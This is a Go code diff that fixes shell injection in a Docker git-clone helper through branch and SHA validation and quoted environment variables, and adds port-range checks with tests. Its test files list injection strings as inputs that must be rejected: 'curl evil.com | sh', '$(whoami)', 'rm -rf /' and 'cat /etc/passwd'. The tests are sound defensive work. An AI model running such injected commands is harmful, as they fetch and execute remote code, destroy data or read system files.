diff --git a/internal/docker/client.go b/internal/docker/client.go index 7e9ec0f..47c799f 100644 --- a/internal/docker/client.go +++ b/internal/docker/client.go @@ -10,6 +10,7 @@ import ( "log/slog" "os" "path/filepath" + "regexp" "strconv" "strings" @@ -46,6 +47,18 @@ var ErrNotConnected = errors.New("docker client not connected") // ErrGitCloneFailed is returned when git clone fails. var ErrGitCloneFailed = errors.New("git clone failed") +// ErrInvalidBranch is returned when a branch name contains invalid characters. +var ErrInvalidBranch = errors.New("invalid branch name") + +// ErrInvalidCommitSHA is returned when a commit SHA is not a valid hex string. +var ErrInvalidCommitSHA = errors.New("invalid commit SHA") + +// validBranchRe matches safe git branch names. +var validBranchRe = regexp.MustCompile(`^[a-zA-Z0-9._/\-]+$`) + +// validCommitSHARe matches a full-length hex commit SHA. +var validCommitSHARe = regexp.MustCompile(`^[0-9a-f]{40}$`) + // Params contains dependencies for Client. type Params struct { fx.In @@ -430,6 +443,15 @@ func (c *Client) CloneRepo( ctx context.Context, repoURL, branch, commitSHA, sshPrivateKey, containerDir, hostDir string, ) (*CloneResult, error) { + // Validate inputs to prevent shell injection + if !validBranchRe.MatchString(branch) { + return nil, fmt.Errorf("%w: %q", ErrInvalidBranch, branch) + } + + if commitSHA != "" && !validCommitSHARe.MatchString(commitSHA) { + return nil, fmt.Errorf("%w: %q", ErrInvalidCommitSHA, commitSHA) + } + if c.docker == nil { return nil, ErrNotConnected } @@ -584,39 +606,36 @@ func (c *Client) createGitContainer( ) (string, error) { gitSSHCmd := "ssh -i /keys/deploy_key -o StrictHostKeyChecking=no" - // Build the git command based on whether we have a specific commit SHA - var cmd []string - - var entrypoint []string - + // Build the git command using environment variables to avoid shell injection. + // Arguments are passed via env vars and quoted in the shell script. + var script string if cfg.commitSHA != "" { // Clone without depth limit so we can checkout any commit, then checkout specific SHA - // Using sh -c to run multiple commands - need to clear entrypoint - // Output "COMMIT:" marker at end for parsing - script := fmt.Sprintf( - "git clone --branch %s %s /repo && cd /repo && git checkout %s && echo COMMIT:$(git rev-parse HEAD)", - cfg.branch, cfg.repoURL, cfg.commitSHA, - ) - entrypoint = []string{} - cmd = []string{"sh", "-c", script} + script = `git clone --branch "$CLONE_BRANCH" "$CLONE_URL" /repo && cd /repo && git checkout "$CLONE_SHA" && echo COMMIT:$(git rev-parse HEAD)` } else { // Shallow clone of branch HEAD, then output commit SHA - // Using sh -c to run multiple commands - script := fmt.Sprintf( - "git clone --depth 1 --branch %s %s /repo && cd /repo && echo COMMIT:$(git rev-parse HEAD)", - cfg.branch, cfg.repoURL, - ) - entrypoint = []string{} - cmd = []string{"sh", "-c", script} + script = `git clone --depth 1 --branch "$CLONE_BRANCH" "$CLONE_URL" /repo && cd /repo && echo COMMIT:$(git rev-parse HEAD)` } + env := []string{ + "GIT_SSH_COMMAND=" + gitSSHCmd, + "CLONE_URL=" + cfg.repoURL, + "CLONE_BRANCH=" + cfg.branch, + } + if cfg.commitSHA != "" { + env = append(env, "CLONE_SHA="+cfg.commitSHA) + } + + entrypoint := []string{} + cmd := []string{"sh", "-c", script} + // Use host paths for Docker bind mounts (Docker runs on the host, not in our container) resp, err := c.docker.ContainerCreate(ctx, &container.Config{ Image: gitImage, Entrypoint: entrypoint, Cmd: cmd, - Env: []string{"GIT_SSH_COMMAND=" + gitSSHCmd}, + Env: env, WorkingDir: "/", }, &container.HostConfig{ diff --git a/internal/docker/validation_test.go b/internal/docker/validation_test.go new file mode 100644 index 0000000..c715a74 --- /dev/null +++ b/internal/docker/validation_test.go @@ -0,0 +1,139 @@ +package docker + +import ( + "errors" + "log/slog" + "testing" +) + +func TestValidBranchRegex(t *testing.T) { + valid := []string{ + "main", + "develop", + "feature/my-feature", + "release-1.0", + "v1.2.3", + "fix/issue_42", + "my.branch", + } + for _, b := range valid { + if !validBranchRe.MatchString(b) { + t.Errorf("expected branch %q to be valid", b) + } + } + + invalid := []string{ + "main; curl evil.com | sh", + "branch$(whoami)", + "branch`id`", + "branch && rm -rf /", + "branch | cat /etc/passwd", + "", + "branch name with spaces", + "branch\nnewline", + } + for _, b := range invalid { + if validBranchRe.MatchString(b) { + t.Errorf("expected branch %q to be invalid (potential injection)", b) + } + } +} + +func TestValidCommitSHARegex(t *testing.T) { + valid := []string{ + "abc123def456789012345678901234567890abcd", + "0000000000000000000000000000000000000000", + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + } + for _, s := range valid { + if !validCommitSHARe.MatchString(s) { + t.Errorf("expected SHA %q to be valid", s) + } + } + + invalid := []string{ + "short", + "abc123", + "ABCDEF1234567890123456789012345678901234", // uppercase + "abc123def456789012345678901234567890abcd; rm -rf /", + "$(whoami)000000000000000000000000000000000", + "", + } + for _, s := range invalid { + if validCommitSHARe.MatchString(s) { + t.Errorf("expected SHA %q to be invalid (potential injection)", s) + } + } +} + +func TestCloneRepoRejectsInjection(t *testing.T) { + c := &Client{ + log: slog.Default(), + } + + tests := []struct { + name string + branch string + commitSHA string + wantErr error + }{ + { + name: "shell injection in branch", + branch: "main; curl evil.com | sh #", + wantErr: ErrInvalidBranch, + }, + { + name: "command substitution in branch", + branch: "$(whoami)", + wantErr: ErrInvalidBranch, + }, + { + name: "backtick injection in branch", + branch: "`id`", + wantErr: ErrInvalidBranch, + }, + { + name: "injection in commitSHA", + branch: "main", + commitSHA: "not-a-sha; rm -rf /", + wantErr: ErrInvalidCommitSHA, + }, + { + name: "short SHA rejected", + branch: "main", + commitSHA: "abc123", + wantErr: ErrInvalidCommitSHA, + }, + { + name: "valid inputs pass validation (hit NotConnected)", + branch: "main", + commitSHA: "abc123def456789012345678901234567890abcd", + wantErr: ErrNotConnected, + }, + { + name: "valid branch no SHA passes validation (hit NotConnected)", + branch: "main", + wantErr: ErrNotConnected, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + _, err := c.CloneRepo( + t.Context(), + "git@example.com:repo.git", + tt.branch, + tt.commitSHA, + "fake-key", + "/tmp/container", + "/tmp/host", + ) + if err == nil { + t.Fatal("expected error, got nil") + } + if !errors.Is(err, tt.wantErr) { + t.Errorf("expected error %v, got %v", tt.wantErr, err) + } + }) + } +} diff --git a/internal/handlers/app.go b/internal/handlers/app.go index 8a94b42..b98eedc 100644 --- a/internal/handlers/app.go +++ b/internal/handlers/app.go @@ -1018,7 +1018,8 @@ func parsePortValues(hostPortStr, containerPortStr string) (int, int, bool) { hostPort, hostErr := strconv.Atoi(hostPortStr) containerPort, containerErr := strconv.Atoi(containerPortStr) - if hostErr != nil || containerErr != nil || hostPort <= 0 || containerPort <= 0 { + const maxPort = 65535 + if hostErr != nil || containerErr != nil || hostPort <= 0 || containerPort <= 0 || hostPort > maxPort || containerPort > maxPort { return 0, 0, false } diff --git a/internal/handlers/port_validation_test.go b/internal/handlers/port_validation_test.go new file mode 100644 index 0000000..e6d6335 --- /dev/null +++ b/internal/handlers/port_validation_test.go @@ -0,0 +1,35 @@ +package handlers + +import "testing" + +func TestParsePortValues(t *testing.T) { + tests := []struct { + name string + host string + container string + wantHost int + wantCont int + wantValid bool + }{ + {"valid ports", "8080", "80", 8080, 80, true}, + {"port 1", "1", "1", 1, 1, true}, + {"port 65535", "65535", "65535", 65535, 65535, true}, + {"host port above 65535", "99999", "80", 0, 0, false}, + {"container port above 65535", "80", "99999", 0, 0, false}, + {"both ports above 65535", "70000", "70000", 0, 0, false}, + {"zero port", "0", "80", 0, 0, false}, + {"negative port", "-1", "80", 0, 0, false}, + {"non-numeric", "abc", "80", 0, 0, false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + host, cont, valid := parsePortValues(tt.host, tt.container) + if host != tt.wantHost || cont != tt.wantCont || valid != tt.wantValid { + t.Errorf("parsePortValues(%q, %q) = (%d, %d, %v), want (%d, %d, %v)", + tt.host, tt.container, host, cont, valid, + tt.wantHost, tt.wantCont, tt.wantValid) + } + }) + } +}